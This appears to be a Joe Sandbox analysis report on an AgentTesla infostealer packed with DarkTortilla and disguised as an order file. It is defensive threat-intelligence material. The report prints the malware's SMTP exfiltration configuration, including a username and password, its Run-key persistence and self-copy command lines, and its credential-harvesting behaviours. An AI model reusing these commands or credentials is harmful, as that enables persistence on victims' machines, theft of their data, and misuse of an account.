Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Orden#46789_2024_Optoflux_mexico_sderls.exe

Overview

General Information

Sample name:Orden#46789_2024_Optoflux_mexico_sderls.exe
Analysis ID:1463465
MD5:9b79cf9008f569169eba09528bf1730c
SHA1:7fdcc0ff2d1a8100acbe2e4e0372734bb4396bc1
SHA256:ada26de90884fdf8d203297f5f5d2db98c411cebc7a8d36114f0b1ee2b413431
Tags:exe
Infos:

Detection

AgentTesla, DarkTortilla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Yara detected AntiVM3
Yara detected DarkTortilla Crypter
AI detected suspicious sample
Allocates memory in foreign processes
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to log keystrokes (.Net Source)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Writes to foreign memory regions
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to launch a process as a different user
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Orden#46789_2024_Optoflux_mexico_sderls.exe (PID: 6524 cmdline: "C:\Users\user\Desktop\Orden#46789_2024_Optoflux_mexico_sderls.exe" MD5: 9B79CF9008F569169EBA09528BF1730C)
    • cmd.exe (PID: 4632 cmdline: "cmd" /c ping 127.0.0.1 -n 16 > nul && REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "vexplorerezz" /t REG_SZ /d "C:\Users\user\AppData\Roaming\vexplorerez.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 1948 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • PING.EXE (PID: 7140 cmdline: ping 127.0.0.1 -n 16 MD5: B3624DD758CCECF93A1226CEF252CA12)
      • reg.exe (PID: 3536 cmdline: REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "vexplorerezz" /t REG_SZ /d "C:\Users\user\AppData\Roaming\vexplorerez.exe" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
    • cmd.exe (PID: 6736 cmdline: "cmd" /c ping 127.0.0.1 -n 18 > nul && copy "C:\Users\user\Desktop\Orden#46789_2024_Optoflux_mexico_sderls.exe" "C:\Users\user\AppData\Roaming\vexplorerez.exe" && ping 127.0.0.1 -n 18 > nul && "C:\Users\user\AppData\Roaming\vexplorerez.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 5016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • PING.EXE (PID: 1292 cmdline: ping 127.0.0.1 -n 18 MD5: B3624DD758CCECF93A1226CEF252CA12)
      • PING.EXE (PID: 5944 cmdline: ping 127.0.0.1 -n 18 MD5: B3624DD758CCECF93A1226CEF252CA12)
      • vexplorerez.exe (PID: 7124 cmdline: "C:\Users\user\AppData\Roaming\vexplorerez.exe" MD5: 9B79CF9008F569169EBA09528BF1730C)
        • Acrobat.exe (PID: 7704 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\PABILOS MOTORES #5 Y 6.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
        • InstallUtil.exe (PID: 7932 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
        • InstallUtil.exe (PID: 7964 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • vexplorerez.exe (PID: 4000 cmdline: "C:\Users\user\AppData\Roaming\vexplorerez.exe" MD5: 9B79CF9008F569169EBA09528BF1730C)
    • Acrobat.exe (PID: 6080 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\PABILOS MOTORES #5 Y 6.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
      • AcroCEF.exe (PID: 1096 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
        • AcroCEF.exe (PID: 5396 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2072 --field-trial-handle=1640,i,4044299627815770156,1797712374859853902,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
    • InstallUtil.exe (PID: 7332 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
    • InstallUtil.exe (PID: 7608 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • chrome.exe (PID: 2184 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://verificacfdi.facturaelectronica.sat.gob.mx/?id=39CA617E-9953-41BD-9564-C41A1E1C5584&re=OOMM710314363&rr=PCM910225B86&tt=6090.00&fe=aUIAsQ== MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
    • chrome.exe (PID: 2100 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2308 --field-trial-handle=2220,i,10829338155938960035,13974893323488573616,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
NameDescriptionAttributionBlogpost URLsLink
DarkTortillaDarkTortilla is a complex and highly configurable .NET-based crypter that has possibly been active since at least August 2015. It typically delivers popular information stealers and remote access trojans (RATs) such as AgentTesla, AsyncRat, NanoCore, and RedLine. While it appears to primarily deliver commodity malware, Secureworks Counter Threat Unit (CTU) researchers identified DarkTortilla samples delivering targeted payloads such as Cobalt Strike and Metasploit. It can also deliver "addon packages" such as additional malicious payloads, benign decoy documents, and executables. It features robust anti-analysis and anti-tamper controls that can make detection, analysis, and eradication challenging.From January 2021 through May 2022, an average of 93 unique DarkTortilla samples per week were uploaded to the VirusTotal analysis service. Code similarities suggest possible links between DarkTortilla and other malware: a crypter operated by the RATs Crew threat group, which was active between 2008 and 2012, and the Gameloader malware that emerged in 2021.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.darktortilla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Port": "587", "Host": "smtp.zoho.eu", "Username": "logs@astonherald.com", "Password": "office12#"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000010.00000002.3865481800.00000000044F0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DarkTortillaYara detected DarkTortilla CrypterJoe Security
    00000010.00000002.3865481800.0000000004534000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DarkTortillaYara detected DarkTortilla CrypterJoe Security
      00000000.00000002.2980414937.00000000028AF000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DarkTortillaYara detected DarkTortilla CrypterJoe Security
        00000010.00000002.3848959756.000000000339F000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DarkTortillaYara detected DarkTortilla CrypterJoe Security
          00000011.00000002.4064362259.0000000003BC0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DarkTortillaYara detected DarkTortilla CrypterJoe Security
            Click to see the 51 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            16.2.vexplorerez.exe.47787c0.1.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              16.2.vexplorerez.exe.47787c0.1.raw.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                16.2.vexplorerez.exe.47787c0.1.raw.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  16.2.vexplorerez.exe.47787c0.1.raw.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                  • 0x35b0f:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                  • 0x35b81:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                  • 0x35c0b:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                  • 0x35c9d:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                  • 0x35d07:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                  • 0x35d79:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                  • 0x35e0f:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                  • 0x35e9f:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                  0.2.Orden#46789_2024_Optoflux_mexico_sderls.exe.b10000.0.unpackJoeSecurity_DarkTortillaYara detected DarkTortilla CrypterJoe Security
                    Click to see the 90 entries

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: CurrentVersion Autorun Keys Modification
                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\vexplorerez.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 3536, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\vexplorerezz
                    Sigma detected: Direct Autorun Keys Modification
                    Source: Process startedAuthor: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "vexplorerezz" /t REG_SZ /d "C:\Users\user\AppData\Roaming\vexplorerez.exe", CommandLine: REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "vexplorerezz" /t REG_SZ /d "C:\Users\user\AppData\Roaming\vexplorerez.exe", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: "cmd" /c ping 127.0.0.1 -n 16 > nul && REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "vexplorerezz" /t REG_SZ /d "C:\Users\user\AppData\Roaming\vexplorerez.exe", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 4632, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "vexplorerezz" /t REG_SZ /d "C:\Users\user\AppData\Roaming\vexplorerez.exe", ProcessId: 3536, ProcessName: reg.exe
                    Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "cmd" /c ping 127.0.0.1 -n 16 > nul && REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "vexplorerezz" /t REG_SZ /d "C:\Users\user\AppData\Roaming\vexplorerez.exe", CommandLine: "cmd" /c ping 127.0.0.1 -n 16 > nul && REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "vexplorerezz" /t REG_SZ /d "C:\Users\user\AppData\Roaming\vexplorerez.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\Orden#46789_2024_Optoflux_mexico_sderls.exe", ParentImage: C:\Users\user\Desktop\Orden#46789_2024_Optoflux_mexico_sderls.exe, ParentProcessId: 6524, ParentProcessName: Orden#46789_2024_Optoflux_mexico_sderls.exe, ProcessCommandLine: "cmd" /c ping 127.0.0.1 -n 16 > nul && REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "vexplorerezz" /t REG_SZ /d "C:\Users\user\AppData\Roaming\vexplorerez.exe", ProcessId: 4632, ProcessName: cmd.exe

                    Snort Signatures

                    No Snort rule has matched

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Found malware configuration
                    Source: 17.2.vexplorerez.exe.3e04792.3.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "smtp.zoho.eu", "Username": "logs@astonherald.com", "Password": "office12#"}
                    Multi AV Scanner detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeReversingLabs: Detection: 68%
                    Multi AV Scanner detection for submitted file
                    Source: Orden#46789_2024_Optoflux_mexico_sderls.exeReversingLabs: Detection: 68%
                    Source: Orden#46789_2024_Optoflux_mexico_sderls.exeVirustotal: Detection: 72%Perma Link
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Machine Learning detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeJoe Sandbox ML: detected
                    Machine Learning detection for sample
                    Source: Orden#46789_2024_Optoflux_mexico_sderls.exeJoe Sandbox ML: detected
                    Source: Orden#46789_2024_Optoflux_mexico_sderls.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: oC:\Windows\dll\System.pdb]gQZ source: vexplorerez.exe, 00000011.00000002.4069562420.0000000005F39000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: HP`oLC:\Windows\Microsoft.VisualBasic.pdb source: vexplorerez.exe, 00000011.00000002.4034368741.0000000000737000.00000004.00000010.00020000.00000000.sdmp
                    Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: vexplorerez.exe, 00000011.00000002.4034654888.0000000000ABB000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: "7f11d50a3a\Microsoft.VisualBasic.pdbh source: vexplorerez.exe, 00000011.00000002.4069562420.0000000005F53000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: System.pdb source: vexplorerez.exe, 00000011.00000002.4034654888.0000000000ABB000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: vexplorerez.exe, 00000011.00000002.4034654888.0000000000A7C000.00000004.00000020.00020000.00000000.sdmp, vexplorerez.exe, 00000011.00000002.4034654888.0000000000ABB000.00000004.00000020.00020000.00000000.sdmp

                    Networking

                    barindex
                    Uses ping.exe to check the status of other devices and networks
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 16
                    Yara detected Generic Downloader
                    Source: Yara matchFile source: 16.2.vexplorerez.exe.47787c0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.vexplorerez.exe.46aceaa.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.vexplorerez.exe.4734a0a.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Orden#46789_2024_Optoflux_mexico_sderls.exe.3c87190.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 24.2.InstallUtil.exe.7c0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Orden#46789_2024_Optoflux_mexico_sderls.exe.3bbb87a.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Orden#46789_2024_Optoflux_mexico_sderls.exe.3c433da.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 17.2.vexplorerez.exe.3d7cc32.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 17.2.vexplorerez.exe.3e48548.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Orden#46789_2024_Optoflux_mexico_sderls.exe.3a00802.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 17.2.vexplorerez.exe.3e04792.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Orden#46789_2024_Optoflux_mexico_sderls.exe.39bca32.4.raw.unpack, type: UNPACKEDPE
                    Source: Joe Sandbox ViewIP Address: 18.244.18.27 18.244.18.27
                    Source: Joe Sandbox ViewIP Address: 23.41.168.139 23.41.168.139
                    Source: Joe Sandbox ViewIP Address: 185.230.214.164 185.230.214.164
                    Source: Joe Sandbox ViewIP Address: 1.1.1.1 1.1.1.1
                    Source: Joe Sandbox ViewIP Address: 18.244.18.122 18.244.18.122
                    Source: chromecache_208.22.drString found in binary or memory: '<li><a class="social-icon share-info facebook" target="_blank" href="https://www.facebook.com/gobmexico/" aria-label="Facebook de presidencia" style="text-decoration:none"></a></li>' + equals www.facebook.com (Facebook)
                    Source: Orden#46789_2024_Optoflux_mexico_sderls.exe, vexplorerez.exe.11.drString found in binary or memory: http://127.0.0.1:8088/
                    Source: E0F5C59F9FA661F6F4C50B87FEF3A15A0.19.drString found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c
                    Source: InstallUtil.exe, 0000001A.00000002.4617818400.0000000005B70000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.4607747615.0000000002D55000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.4606030042.0000000000C8B000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.4607747615.0000000002984000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.thawte.com/ThawteTLSRSACAG1.crt0
                    Source: InstallUtil.exe, 0000001A.00000002.4617818400.0000000005B70000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.4607747615.0000000002D55000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.4606030042.0000000000C8B000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.4607747615.0000000002984000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cdp.thawte.com/ThawteTLSRSACAG1.crl0p
                    Source: InstallUtil.exe, 0000001A.00000002.4617818400.0000000005B70000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.4607747615.0000000002D55000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.4606030042.0000000000C8B000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.4607747615.0000000002984000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0=
                    Source: chromecache_192.22.drString found in binary or memory: http://getbootstrap.com)
                    Source: InstallUtil.exe, 0000001A.00000002.4607747615.0000000002921000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
                    Source: Orden#46789_2024_Optoflux_mexico_sderls.exe, 00000000.00000002.2983258832.0000000003B60000.00000004.00000800.00020000.00000000.sdmp, Orden#46789_2024_Optoflux_mexico_sderls.exe, 00000000.00000002.2983258832.0000000003969000.00000004.00000800.00020000.00000000.sdmp, Orden#46789_2024_Optoflux_mexico_sderls.exe, 00000000.00000002.2983258832.0000000003C43000.00000004.00000800.00020000.00000000.sdmp, vexplorerez.exe, 00000010.00000002.3865481800.0000000004734000.00000004.00000800.00020000.00000000.sdmp, vexplorerez.exe, 00000010.00000002.3865481800.0000000004371000.00000004.00000800.00020000.00000000.sdmp, vexplorerez.exe, 00000010.00000002.3865481800.0000000004652000.00000004.00000800.00020000.00000000.sdmp, vexplorerez.exe, 00000011.00000002.4064362259.0000000003D22000.00000004.00000800.00020000.00000000.sdmp, vexplorerez.exe, 00000011.00000002.4064362259.0000000003E04000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000018.00000002.3511312688.00000000007C2000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.4607747615.0000000002921000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
                    Source: chromecache_190.22.drString found in binary or memory: http://jquery.org/license
                    Source: chromecache_192.22.drString found in binary or memory: http://jqueryui.com
                    Source: chromecache_213.22.drString found in binary or memory: http://modernizr.com/download/#-shiv-printshiv-load-mq-cssclasses-svg
                    Source: InstallUtil.exe, 0000001A.00000002.4617818400.0000000005B70000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.4607747615.0000000002D55000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.4606030042.0000000000C8B000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.4607747615.0000000002984000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0B
                    Source: Orden#46789_2024_Optoflux_mexico_sderls.exe, vexplorerez.exe.11.drString found in binary or memory: http://pavichdev.ddns.net/api/v1-act/activate.php?ver=PBrowserBuilder
                    Source: Orden#46789_2024_Optoflux_mexico_sderls.exe, vexplorerez.exe.11.drString found in binary or memory: http://pavichdev.ddns.net/api/v2-pbb/newsfeed/nf1_date.txt
                    Source: Orden#46789_2024_Optoflux_mexico_sderls.exe, vexplorerez.exe.11.drString found in binary or memory: http://pavichdev.ddns.net/api/v2-pbb/newsfeed/nf1_desc.txt
                    Source: Orden#46789_2024_Optoflux_mexico_sderls.exe, vexplorerez.exe.11.drString found in binary or memory: http://pavichdev.ddns.net/api/v2-pbb/newsfeed/nf1_title.txt
                    Source: Orden#46789_2024_Optoflux_mexico_sderls.exe, vexplorerez.exe.11.drString found in binary or memory: http://pavichdev.ddns.net/old/Home.html#feedbackintro=Application
                    Source: vexplorerez.exe, 00000011.00000002.4073896500.000000000658F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://purl.oen
                    Source: vexplorerez.exe, 00000011.00000002.4037955042.0000000002A6F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schema.org/WebPage
                    Source: Orden#46789_2024_Optoflux_mexico_sderls.exe, 00000000.00000002.2980414937.0000000002881000.00000004.00000800.00020000.00000000.sdmp, vexplorerez.exe, 00000010.00000002.3848959756.0000000003371000.00000004.00000800.00020000.00000000.sdmp, vexplorerez.exe, 00000011.00000002.4037955042.0000000002A4D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.4607747615.0000000002921000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: InstallUtil.exe, 0000001A.00000002.4607747615.0000000002D55000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.4607747615.0000000002984000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://smtp.zoho.eu
                    Source: InstallUtil.exe, 0000001A.00000002.4617818400.0000000005B70000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.4607747615.0000000002D55000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.4606030042.0000000000C8B000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.4607747615.0000000002984000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://status.thawte.com0:
                    Source: vexplorerez.exe, 00000011.00000002.4037955042.0000000002A6F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.blogger.com/?tab=wj
                    Source: InstallUtil.exe, 0000001A.00000002.4617818400.0000000005B70000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.4607747615.0000000002D55000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.4606030042.0000000000C8B000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.4607747615.0000000002984000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                    Source: chromecache_195.22.drString found in binary or memory: http://www.gob.mx/
                    Source: Orden#46789_2024_Optoflux_mexico_sderls.exe, vexplorerez.exe.11.drString found in binary or memory: http://www.google.com
                    Source: Orden#46789_2024_Optoflux_mexico_sderls.exe, 00000000.00000002.2980414937.0000000002881000.00000004.00000800.00020000.00000000.sdmp, vexplorerez.exe, 00000010.00000002.3848959756.0000000003371000.00000004.00000800.00020000.00000000.sdmp, vexplorerez.exe, 00000011.00000002.4037955042.0000000002A4D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/
                    Source: vexplorerez.exe, 00000010.00000002.3848959756.000000000339F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/mobile/?hl=en&tab=wD
                    Source: chromecache_208.22.drString found in binary or memory: http://www.ordenjuridico.gob.mx/
                    Source: chromecache_208.22.drString found in binary or memory: http://www.participa.gob.mx/
                    Source: Orden#46789_2024_Optoflux_mexico_sderls.exe, 00000000.00000002.2983258832.0000000003B60000.00000004.00000800.00020000.00000000.sdmp, Orden#46789_2024_Optoflux_mexico_sderls.exe, 00000000.00000002.2983258832.0000000003969000.00000004.00000800.00020000.00000000.sdmp, Orden#46789_2024_Optoflux_mexico_sderls.exe, 00000000.00000002.2983258832.0000000003C43000.00000004.00000800.00020000.00000000.sdmp, vexplorerez.exe, 00000010.00000002.3865481800.0000000004734000.00000004.00000800.00020000.00000000.sdmp, vexplorerez.exe, 00000010.00000002.3865481800.0000000004371000.00000004.00000800.00020000.00000000.sdmp, vexplorerez.exe, 00000010.00000002.3865481800.0000000004652000.00000004.00000800.00020000.00000000.sdmp, vexplorerez.exe, 00000011.00000002.4064362259.0000000003D22000.00000004.00000800.00020000.00000000.sdmp, vexplorerez.exe, 00000011.00000002.4064362259.0000000003E04000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000018.00000002.3511312688.00000000007C2000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                    Source: vexplorerez.exe, 00000011.00000002.4037955042.0000000002A6F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/ServiceLogin?hl=en&passive=true&continue=http://www.google.com/&ec=GAZAA
                    Source: chromecache_190.22.drString found in binary or memory: https://bugs.chromium.org/p/chromium/issues/detail?id=378607
                    Source: chromecache_190.22.drString found in binary or memory: https://bugs.chromium.org/p/chromium/issues/detail?id=449857
                    Source: chromecache_190.22.drString found in binary or memory: https://bugs.chromium.org/p/chromium/issues/detail?id=470258
                    Source: chromecache_190.22.drString found in binary or memory: https://bugs.chromium.org/p/chromium/issues/detail?id=589347
